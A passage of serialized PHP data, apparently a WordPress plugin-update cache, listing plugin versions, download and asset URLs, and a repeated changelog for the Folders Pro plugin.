ple-custom-css.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/simple-custom-css\";s:4:\"slug\";s:17:\"simple-custom-css\";s:6:\"plugin\";s:39:\"simple-custom-css/simple-custom-css.php\";s:11:\"new_version\";s:5:\"4.0.6\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/simple-custom-css/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/simple-custom-css.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/simple-custom-css/assets/icon-256x256.jpg?rev=1819543\";s:2:\"1x\";s:70:\"https://ps.w.org/simple-custom-css/assets/icon-128x128.jpg?rev=1819543\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/simple-custom-css/assets/banner-1544x500.jpg?rev=1819543\";s:2:\"1x\";s:72:\"https://ps.w.org/simple-custom-css/assets/banner-772x250.jpg?rev=1819543\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";}s:24:\"simple-history/index.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/simple-history\";s:4:\"slug\";s:14:\"simple-history\";s:6:\"plugin\";s:24:\"simple-history/index.php\";s:11:\"new_version\";s:5:\"4.7.2\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/simple-history/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/simple-history.4.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/simple-history/assets/icon-256x256.png?rev=2985222\";s:2:\"1x\";s:67:\"https://ps.w.org/simple-history/assets/icon-128x128.png?rev=2985222\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/simple-history/assets/banner-1544x500.png?rev=2661050\";s:2:\"1x\";s:69:\"https://ps.w.org/simple-history/assets/banner-772x250.png?rev=2661050\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.1\";}s:19:\"404page/404page.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/404page\";s:4:\"slug\";s:7:\"404page\";s:6:\"plugin\";s:19:\"404page/404page.php\";s:11:\"new_version\";s:6:\"11.4.4\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/404page/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/404page.11.4.4.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:52:\"https://ps.w.org/404page/assets/icon.svg?rev=2451324\";s:3:\"svg\";s:52:\"https://ps.w.org/404page/assets/icon.svg?rev=2451324\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:35:\"boldgrid-backup/boldgrid-backup.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/boldgrid-backup\";s:4:\"slug\";s:15:\"boldgrid-backup\";s:6:\"plugin\";s:35:\"boldgrid-backup/boldgrid-backup.php\";s:11:\"new_version\";s:6:\"1.15.7\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/boldgrid-backup/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/boldgrid-backup.1.15.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/boldgrid-backup/assets/icon-256x256.png?rev=1880952\";s:2:\"1x\";s:68:\"https://ps.w.org/boldgrid-backup/assets/icon-128x128.png?rev=1880952\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/boldgrid-backup/assets/banner-1544x500.png?rev=1880952\";s:2:\"1x\";s:70:\"https://ps.w.org/boldgrid-backup/assets/banner-772x250.png?rev=1880952\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:7:\"1.23.11\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/updraftplus.1.23.11.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.2\";}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:6:\"7.10.7\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wordfence.7.10.7.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";}s:27:\"wp-optimize/wp-optimize.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/wp-optimize\";s:4:\"slug\";s:11:\"wp-optimize\";s:6:\"plugin\";s:27:\"wp-optimize/wp-optimize.php\";s:11:\"new_version\";s:6:\"3.2.21\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/wp-optimize/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wp-optimize.3.2.21.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/wp-optimize/assets/icon-256x256.png?rev=1552899\";s:2:\"1x\";s:64:\"https://ps.w.org/wp-optimize/assets/icon-128x128.png?rev=1552899\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/wp-optimize/assets/banner-1544x500.png?rev=2125385\";s:2:\"1x\";s:66:\"https://ps.w.org/wp-optimize/assets/banner-772x250.png?rev=2125385\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";}s:35:\"insert-headers-and-footers/ihaf.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:40:\"w.org/plugins/insert-headers-and-footers\";s:4:\"slug\";s:26:\"insert-headers-and-footers\";s:6:\"plugin\";s:35:\"insert-headers-and-footers/ihaf.php\";s:11:\"new_version\";s:7:\"2.1.4.1\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/insert-headers-and-footers/\";s:7:\"package\";s:77:\"https://downloads.wordpress.org/plugin/insert-headers-and-footers.2.1.4.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-256x256.png?rev=2758516\";s:2:\"1x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-128x128.png?rev=2758516\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/insert-headers-and-footers/assets/banner-1544x500.png?rev=2758516\";s:2:\"1x\";s:81:\"https://ps.w.org/insert-headers-and-footers/assets/banner-772x250.png?rev=2758516\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:35:\"wp-fastest-cache/wpFastestCache.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:30:\"w.org/plugins/wp-fastest-cache\";s:4:\"slug\";s:16:\"wp-fastest-cache\";s:6:\"plugin\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:11:\"new_version\";s:5:\"1.2.1\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/wp-fastest-cache/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/wp-fastest-cache.1.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wp-fastest-cache/assets/icon-256x256.png?rev=2064586\";s:2:\"1x\";s:69:\"https://ps.w.org/wp-fastest-cache/assets/icon-128x128.png?rev=1068904\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/wp-fastest-cache/assets/banner-772x250.jpg?rev=1064099\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:25:\"wp-staging/wp-staging.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/wp-staging\";s:4:\"slug\";s:10:\"wp-staging\";s:6:\"plugin\";s:25:\"wp-staging/wp-staging.php\";s:11:\"new_version\";s:5:\"3.1.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/wp-staging/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wp-staging.3.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/wp-staging/assets/icon-256x256.png?rev=2972932\";s:2:\"1x\";s:63:\"https://ps.w.org/wp-staging/assets/icon-256x256.png?rev=2972932\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wp-staging/assets/banner-1544x500.png?rev=2602209\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-staging/assets/banner-772x250.png?rev=2602209\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.6\";}s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:38:\"w.org/plugins/google-sitemap-generator\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:6:\"4.1.13\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/google-sitemap-generator.4.1.13.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/google-sitemap-generator/assets/icon-256x256.png?rev=2713572\";s:2:\"1x\";s:77:\"https://ps.w.org/google-sitemap-generator/assets/icon-128x128.png?rev=2713572\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:79:\"https://ps.w.org/google-sitemap-generator/assets/banner-772-250.png?rev=2713572\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";}s:33:\"duplicate-post/duplicate-post.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/duplicate-post\";s:4:\"slug\";s:14:\"duplicate-post\";s:6:\"plugin\";s:33:\"duplicate-post/duplicate-post.php\";s:11:\"new_version\";s:3:\"4.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/duplicate-post/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/duplicate-post.4.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-256x256.png?rev=2336666\";s:2:\"1x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-128x128.png?rev=2336666\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/duplicate-post/assets/banner-1544x500.png?rev=2336666\";s:2:\"1x\";s:69:\"https://ps.w.org/duplicate-post/assets/banner-772x250.png?rev=2336666\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";}s:23:\"folders-pro/folders.php\";O:8:\"stdClass\":16:{s:11:\"new_version\";s:5:\"2.9.9\";s:14:\"stable_version\";s:5:\"2.9.9\";s:4:\"name\";s:7:\"Folders\";s:4:\"slug\";s:7:\"folders\";s:3:\"url\";s:51:\"https://go.premio.io/downloads/folders/?changelog=1\";s:12:\"last_updated\";s:19:\"2023-09-27 10:35:13\";s:8:\"homepage\";s:39:\"https://go.premio.io/downloads/folders/\";s:7:\"package\";s:197:\"https://go.premio.io/edd-sl/package_download/MTY5OTQ3MTQ1MjpiMzAzYmY3OTQ5N2RiZDk3MGVmM2NjMzdjNzNhYjZlMDo2ODc6MTA2MDk0MDcxZmU5ZmEyMjFkNjllNmYyYWQzNTVlNDU6aHR0cHNALy9lY2thbmthci1jb2xvcmFkby5vcmc6MA==\";s:13:\"download_link\";s:197:\"https://go.premio.io/edd-sl/package_download/MTY5OTQ3MTQ1MjpiMzAzYmY3OTQ5N2RiZDk3MGVmM2NjMzdjNzNhYjZlMDo2ODc6MTA2MDk0MDcxZmU5ZmEyMjFkNjllNmYyYWQzNTVlNDU6aHR0cHNALy9lY2thbmthci1jb2xvcmFkby5vcmc6MA==\";s:8:\"sections\";O:8:\"stdClass\":2:{s:11:\"description\";s:0:\"\";s:9:\"changelog\";s:7767:\"<p>= 2.9.9 =<br />\nDB bug fixed</p>\n<p>= 2.9.8 =<br />\nThrive Themes bug fixed</p>\n<p>= 2.9.7 =<br />\nChanged shortcut for creating a new folder (Gutenberg conflict resolved)</p>\n<p>= 2.9.6 =<br />\nScroll bug fix</p>\n<p>= 2.9.5 =<br />\nBugs fixed</p>\n<p>= 2.8.8 =<br />\n- Infrastructure improvements - Folders works faster now<br />\n- Added Folders support for Plugins<br />\n- WooCommerce product support for Dynamic Folders<br />\n- Added support for LMS LearnPress plugin<br />\n- Bugs fixed</p>\n<p>= 2.8.7 =<br />\n- Media library files url bug fixed<br />\n- Notification background bug fixed</p>\n<p>= 2.8.6 =<br />\n- Folders user access management - advanced folders access management for your team with roles that restrict their access to view and edit your website’s folders (Pro feature)<br />\n- New folders will be added to the top of the folders list<br />\n- We’ve improved folders compatibility with the WPML plugin and MailPoet<br />\n- Fixed a notice for PHP 8.0<br />\n- BuddyBoss items count bug fixed<br />\n- WebP Express bug fixed<br />\n- Media replace works fine with SVG and WebP files now<br />\n- Download folder as a ZIP bug fixed for big folders</p>\n<p>= 2.8.5 =<br />\nFolders import bug fixed</p>\n<p>= 2.8.4 =<br />\n- We\'ve added a horizontal scroll to the folders view<br />\n- Importing folders works better and faster now, the same goes for uploading folders and media library scan for used files<br />\n- Published/Drafts view works for specific folders too<br />\n- Fixed some bugs</p>\n<p>= 2.8.3 =<br />\nTexts changed</p>\n<p>= 2.8.2 =<br />\nAdded a \"Size\" column to the Media Cleaning feature and fixed a keyboard shortcuts bug</p>\n<p>= 2.8.1 =<br />\nBugs fixed</p>\n<p>= 2.8 =<br />\nAdded the option to clean unused media library files<br />\nAdded keyboard shortcuts<br />\nWhen you activate your license key it\'ll be hidden, a great feature for agencies that don\'t want to expose their license key to customers<br />\nFixed some bugs :)</p>\n<p>= 2.7.8 =<br />\nBugs fixed</p>\n<p>= 2.7.7 =<br />\nDivi bug fixed</p>\n<p>= 2.7.6 =<br />\nPerformance improvements</p>\n<p>= 2.7.5 =<br />\nReplace media bugs fixed</p>\n<p>= 2.7.4 =<br />\nWordPress 5.8 compatibility</p>\n<p>= 2.7.3 =<br />\nWe\'ve added the following features:</p>\n<p>Action bar that\'ll help you cut/copy/paste folders.<br />\nUpload folders directly from your computer now and keep the same local structure of folders.<br />\nRecycle bin feature to the media library.<br />\nLock/unlock all folders with the click of a button.<br />\nFolders restrictions based on the user who created the folder.</p>\n<p>We\'ve also added some UI improvements to make the usability as smooth as possible.</p>\n<p>= 2.7.2 =<br />\nDynamic folders bug fixed</p>\n<p>= 2.7.1 =<br />\nDynamic folders, auto rename files feature, undo your last action, advanced media replace features, and fixed some bugs</p>\n<p>= 2.7 =<br />\nWe fixed the issue where metadata details on hover could not be disabled</p>\n<p>= 2.6.9 =<br />\nLock folders, on-hover data for media library files, more file-type support for the media replacement functionality, and somebug fixes</p>\n<p>= 2.6.8 =<br />\nList view folders bulk actions bug fixed</p>\n<p>= 2.6.7 =<br />\nBugs fixed</p>\n<p>= 2.6.6 =<br />\nBugs fixed + more import options</p>\n<p>= 2.6.5 =<br />\niPad bugs fixed</p>\n<p>= 2.6.4 =<br />\nReplace media feature, import option (FileBird, Enhanced Media Library, Wicked Folders, Real Media Library, and WP Media Folder), create multiple folders at once (comma separated), option to hide Folders settings from the main menu, bug fixed</p>\n<p>= 2.6.3 =<br />\nWordPress 5.6 compatibility + Visual composer overlapping bug fixed</p>\n<p>= 2.6.2 =<br />\nVarious bugs fixed</p>\n<p>= 2.6.1 =<br />\nGallery related bugs and items-counter issues were fixed</p>\n<p>= 2.6 =<br />\nClass name bug fixed</p>\n<p>= 2.5.9 =<br />\nWe\'ve significantly improved the drag and drop experience (and we\'ve also fixed some bugs)</p>\n<p>= 2.5.8 =<br />\nFolders settings checkbox bug fix and some other minor bugs were fixed</p>\n<p>= 2.5.7 =<br />\nQuick edit and search folder fix</p>\n<p>= 2.5.6 =<br />\nCSS bug fixed</p>\n<p>= 2.5.4 =<br />\nVarious bugs were fixed after our last major release</p>\n<p>= 2.5.3 =<br />\nNew and better design! We\'ve added a search field, the minimum size of the Folders area is much smaller now, we\'ve added Folders to the add media view, added a duplicate option, and many other cool features and bug fixes.</p>\n<p>= 2.5.2 =<br />\nSort your folders based on name and creation date. We\'ve also added some usability improvements, fixed some WPML and Polylang issue, and fixed some bugs</p>\n<p>= 2.5.1 =</p>\n<p>Sticky folders - pin your favorite folders to the folders\' navigation bar. When you use a media library folder in pages and posts, your choice will be stored for the next uses. We\'ve also fixed some RTL UI issues. You can also remove the upper folders if you want. We\'ve added an option to bulk move files in the media library in list mode (not using drag and drop).</p>\n<p>= 2.5 =<br />\nThe Add new page of the media library is not connected to Folders</p>\n<p>= 2.4.9 =<br />\nPages and posts count fix</p>\n<p>= 2.4.8 =<br />\nFolders plugin now supports non-public custom post types</p>\n<p>= 2.4.7 =<br />\nFrom now on when you clone/edit/publish pages, posts and custom posts in a specific folder, you\'ll stay in that folder</p>\n<p>= 2.4.6 =<br />\nSmall bugs fixed including: folder filtering bugs (trash, draft etc), WooCommerce products duplicate bug, quick edit in folders, Media Library Assistant compatibility and more</p>\n<p>= 2.4.5 =<br />\nAdded a progress bar when you upload files to the media library folders. You can now track how many files were uploaded in real time. We\'ve also fixed a default folders bug.</p>\n<p>= 2.4.4 =<br />\nPHP 7.3 fix</p>\n<p>= 2.4.3 =<br />\nMove elements (media library, posts, pages, custom posts) to folders by selecting the element and selecting the relevant folder from our dropdown. Also added some UI improvements :)</p>\n<p>= 2.4.2 =<br />\nNew download folder as Zip feature</p>\n<p>= 2.4.1 =<br />\nPolylang media library fix</p>\n<p>= 2.4 =<br />\nFolder order when adding a media library file to posts/pages fix, infrastructure improvements, and license activation for none-ssl website support</p>\n<p>= 2.3.9 =<br />\nThrive Themes Architect bug fixed</p>\n<p>= 2.3.8 =<br />\nYou can bulk delete folders now. You can also create a new folder from the upload screen in the media library. We\'ve also fixed some bugs like Polylang compatibility bug, folders order bug, default folder bug, and other minor bugs.</p>\n<p>= 2.3.7 =<br />\nYou can customize the folders look and feel now: change colors, font, and size of folders. We\'ve also added some features to improve the easy-of-use like Enter key to create a new folder and more.</p>\n<p>= 2.3.6 =<br />\nWe\'ve added an indication for successful actions (like moving elements into a folder, changing folders names etc)</p>\n<p>= 2.3.5 =<br />\nSelect a default folder for your media library, pages, posts, and custom posts. We\'ve also added a knowledge base with all FAQs.</p>\n<p>= 2.3.4 =<br />\nList view bulk moving bug fix</p>\n<p>= 2.3.3 =<br />\nDropdown bug fix</p>\n<p>= 2.3.2 =<br />\nBetter folder drag and drop</p>\n<p>= 2.3.1 =<br />\nBug fixes</p>\n<p>= 2.3 =<br />\nFolders is much faster and smoother now. We\'ve also fixed a media library resolution bug for Mac+Safari</p>\n<p>= 2.2.9 =<br />\nClass variable folder fixes</p>\n<p>= 2.2.8 =<br />\nJavascript functionality conflict</p>\n<p>= 2.2.7 =<br />\n* Fixed another sweetalert issue</p>\n<p>= 2.2.6 =<br />\n* Replaced sweetalert to avoid conflicts with other plugins</p>\n<p>= 2.2.5 =<br />\n* Minor license key activation bug</p>\n<p>= 2.2.4 =<br />\n* Fixed collapsed menu state bug</p>\n\";}s:7:\"banners\";O:8:\"stdClass\":2:{s:4:\"high\";s:0:\"\";s:3:\"low\";s:0:\"\";}s:5:\"icons\";a:2:{s:2:\"1x\";s:71:\"https://go.premio.io/wp-content/uploads/edd/2022/05/folders-128x128.gif\";s:2:\"2x\";s:63:\"https://go.premio.io/wp-content/uploads/edd/2022/05/folders.gif\";}s:11:\"description\";a:1:{i:0;s:0:\"\";}s:9:\"changelog\";a:1:{i:0;s:7767:\"<p>= 2.9.9 =<br />\nDB bug fixed</p>\n<p>= 2.9.8 =<br />\nThrive Themes bug fixed</p>\n<p>= 2.9.7 =<br />\nChanged shortcut for creating a new folder (Gutenberg conflict resolved)</p>\n<p>= 2.9.6 =<br />\nScroll bug fix</p>\n<p>= 2.9.5 =<br />\nBugs fixed</p>\n<p>= 2.8.8 =<br />\n- Infrastructure improvements - Folders works faster now<br />\n- Added Folders support for Plugins<br />\n- WooCommerce product support for Dynamic Folders<br />\n- Added support for LMS LearnPress plugin<br />\n- Bugs fixed</p>\n<p>= 2.8.7 =<br />\n- Media library files url bug fixed<br />\n- Notification background bug fixed</p>\n<p>= 2.8.6 =<br />\n- Folders user access management - advanced folders access management for your team with roles that restrict their access to view and edit your website’s folders (Pro feature)<br />\n- New folders will be added to the top of the folders list<br />\n- We’ve improved folders compatibility with the WPML plugin and MailPoet<br />\n- Fixed a notice for PHP 8.0<br />\n- BuddyBoss items count bug fixed<br />\n- WebP Express bug fixed<br />\n- Media replace works fine with SVG and WebP files now<br />\n- Download folder as a ZIP bug fixed for big folders</p>\n<p>= 2.8.5 =<br />\nFolders import bug fixed</p>\n<p>= 2.8.4 =<br />\n- We\'ve added a horizontal scroll to the folders view<br />\n- Importing folders works better and faster now, the same goes for uploading folders and media library scan for used files<br />\n- Published/Drafts view works for specific folders too<br />\n- Fixed some bugs</p>\n<p>= 2.8.3 =<br />\nTexts changed</p>\n<p>= 2.8.2 =<br />\nAdded a \"Size\" column to the Media Cleaning feature and fixed a keyboard shortcuts bug</p>\n<p>= 2.8.1 =<br />\nBugs fixed</p>\n<p>= 2.8 =<br />\nAdded the option to clean unused media library files<br />\nAdded keyboard shortcuts<br />\nWhen you activate your license key it\'ll be hidden, a great feature for agencies that don\'t want to expose their license key to customers<br />\nFixed some bugs :)</p>\n<p>= 2.7.8 =<br />\nBugs fixed</p>\n<p>= 2.7.7 =<br />\nDivi bug fixed</p>\n<p>= 2.7.6 =<br />\nPerformance improvements</p>\n<p>= 2.7.5 =<br />\nReplace media bugs fixed</p>\n<p>= 2.7.4 =<br />\nWordPress 5.8 compatibility</p>\n<p>= 2.7.3 =<br />\nWe\'ve added the following features:</p>\n<p>Action bar that\'ll help you cut/copy/paste folders.<br />\nUpload folders directly from your computer now and keep the same local structure of folders.<br />\nRecycle bin feature to the media library.<br />\nLock/unlock all folders with the click of a button.<br />\nFolders restrictions based on the user who created the folder.</p>\n<p>We\'ve also added some UI improvements to make the usability as smooth as possible.</p>\n<p>= 2.7.2 =<br />\nDynamic folders bug fixed</p>\n<p>= 2.7.1 =<br />\nDynamic folders, auto rename files feature, undo your last action, advanced media replace features, and fixed some bugs</p>\n<p>= 2.7 =<br />\nWe fixed the issue where metadata details on hover could not be disabled</p>\n<p>= 2.6.9 =<br />\nLock folders, on-hover data for media library files, more file-type support for the media replacement functionality, and somebug fixes</p>\n<p>= 2.6.8 =<br />\nList view folders bulk actions bug fixed</p>\n<p>= 2.6.7 =<br />\nBugs fixed</p>\n<p>= 2.6.6 =<br />\nBugs fixed + more import options</p>\n<p>= 2.6.5 =<br />\niPad bugs fixed</p>\n<p>= 2.6.4 =<br />\nReplace media feature, import option (FileBird, Enhanced Media Library, Wicked Folders, Real Media Library, and WP Media Folder), create multiple folders at once (comma separated), option to hide Folders settings from the main menu, bug fixed</p>\n<p>= 2.6.3 =<br />\nWordPress 5.6 compatibility + Visual composer overlapping bug fixed</p>\n<p>= 2.6.2 =<br />\nVarious bugs fixed</p>\n<p>= 2.6.1 =<br />\nGallery related bugs and items-counter issues were fixed</p>\n<p>= 2.6 =<br />\nClass name bug fixed</p>\n<p>= 2.5.9 =<br />\nWe\'ve significantly improved the drag and drop experience (and we\'ve also fixed some bugs)</p>\n<p>= 2.5.8 =<br />\nFolders settings checkbox bug fix and some other minor bugs were fixed</p>\n<p>= 2.5.7 =<br />\nQuick edit and search folder fix</p>\n<p>= 2.5.6 =<br />\nCSS bug fixed</p>\n<p>= 2.5.4 =<br />\nVarious bugs were fixed after our last major release</p>\n<p>= 2.5.3 =<br />\nNew and better design! We\'ve added a search field, the minimum size of the Folders area is much smaller now, we\'ve added Folders to the add media view, added a duplicate option, and many other cool features and bug fixes.</p>\n<p>= 2.5.2 =<br />\nSort your folders based on name and creation date. We\'ve also added some usability improvements, fixed some WPML and Polylang issue, and fixed some bugs</p>\n<p>= 2.5.1 =</p>\n<p>Sticky folders - pin your favorite folders to the folders\' navigation bar. When you use a media library folder in pages and posts, your choice will be stored for the next uses. We\'ve also fixed some RTL UI issues. You can also remove the upper folders if you want. We\'ve added an option to bulk move files in the media library in list mode (not using drag and drop).</p>\n<p>= 2.5 =<br />\nThe Add new page of the media library is not connected to Folders</p>\n<p>= 2.4.9 =<br />\nPages and posts count fix</p>\n<p>= 2.4.8 =<br />\nFolders plugin now supports non-public custom post types</p>\n<p>= 2.4.7 =<br />\nFrom now on when you clone/edit/publish pages, posts and custom posts in a specific folder, you\'ll stay in that folder</p>\n<p>= 2.4.6 =<br />\nSmall bugs fixed including: folder filtering bugs (trash, draft etc), WooCommerce products duplicate bug, quick edit in folders, Media Library Assistant compatibility and more</p>\n<p>= 2.4.5 =<br />\nAdded a progress bar when you upload files to the media library folders. You can now track how many files were uploaded in real time. We\'ve also fixed a default folders bug.</p>\n<p>= 2.4.4 =<br />\nPHP 7.3 fix</p>\n<p>= 2.4.3 =<br />\nMove elements (media library, posts, pages, custom posts) to folders by selecting the element and selecting the relevant folder from our dropdown. Also added some UI improvements :)</p>\n<p>= 2.4.2 =<br />\nNew download folder as Zip feature</p>\n<p>= 2.4.1 =<br />\nPolylang media library fix</p>\n<p>= 2.4 =<br />\nFolder order when adding a media library file to posts/pages fix, infrastructure improvements, and license activation for none-ssl website support</p>\n<p>= 2.3.9 =<br />\nThrive Themes Architect bug fixed</p>\n<p>= 2.3.8 =<br />\nYou can bulk delete folders now. You can also create a new folder from the upload screen in the media library. We\'ve also fixed some bugs like Polylang compatibility bug, folders order bug, default folder bug, and other minor bugs.</p>\n<p>= 2.3.7 =<br />\nYou can customize the folders look and feel now: change colors, font, and size of folders. We\'ve also added some features to improve the easy-of-use like Enter key to create a new folder and more.</p>\n<p>= 2.3.6 =<br />\nWe\'ve added an indication for successful actions (like moving elements into a folder, changing folders names etc)</p>\n<p>= 2.3.5 =<br />\nSelect a default folder for your media library, pages, posts, and custom posts. We\'ve also added a knowledge base with all FAQs.</p>\n<p>= 2.3.4 =<br />\nList view bulk moving bug fix</p>\n<p>= 2.3.3 =<br />\nDropdown bug fix</p>\n<p>= 2.3.2 =<br />\nBetter folder drag and drop</p>\n<p>= 2.3.1 =<br />\nBug fixes</p>\n<p>= 2.3 =<br />\nFolders is much faster and smoother now. We\'ve also fixed a media library resolution bug for Mac+Safari</p>\n<p>= 2.2.9 =<br />\nClass variable folder fixes</p>\n<p>= 2.2.8 =<br />\nJavascript functionality conflict</p>\n<p>= 2.2.7 =<br />\n* Fixed another sweetalert issue</p>\n<p>= 2.2.6 =<br />\n* Replaced sweetalert to avoid conflicts with other plugins</p>\n<p>= 2.2.5 =<br />\n* Minor license key activation bug</p>\n<p>= 2.2.4 =<br />\n* Fixed collapsed menu state bug</p>\n\";}s:6:\"plugin\";s:23:\"folders-pro/folders.php\";s:2:\"id\";s:23:\"folders-pro/folders.php\";}s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";O:8:\"stdClass\":5:{s:4:\"slug\";s:29:\"post-and-page-builder-premium\";s:6:\"plugin\";s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";s:11:\"new_version\";s:5:\"1.1.2\";s:3:\"url\";s:24:\"http://www.boldgrid.com/\";s:7:\"package\";s:112:\"https://api.boldgrid.com/api/open/get-asset?id=1291904&installed_plugin_version=1.1.2&installed_wp_version=6.3.2\";}}s:7:\"checked\";a:41:{s:37:\"tinymce-advanced/tinymce-advanced.php\";s:5:\"5.9.2\";s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";s:4:\"1.12\";s:37:\"async-javascript/async-javascript.php\";s:10:\"2.21.08.31\";s:27:\"autoptimize/autoptimize.php\";s:5:\"3.1.9\";s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";s:6:\"1.6.13\";s:31:\"kt-tinymce-color-grid/index.php\";s:6:\"1.15.5\";s:31:\"code-snippets/code-snippets.php\";s:5:\"3.6.1\";s:37:\"disable-comments/disable-comments.php\";s:5:\"2.4.5\";s:25:\"fluentform/fluentform.php\";s:5:\"5.1.1\";s:23:\"folders-pro/folders.php\";s:5:\"2.9.9\";s:43:\"ga-google-analytics/ga-google-analytics.php\";s:8:\"20231101\";s:65:\"html-editor-syntax-highlighter/html-editor-syntax-highlighter.php\";s:5:\"2.4.4\";s:41:\"mec-fluent-layouts/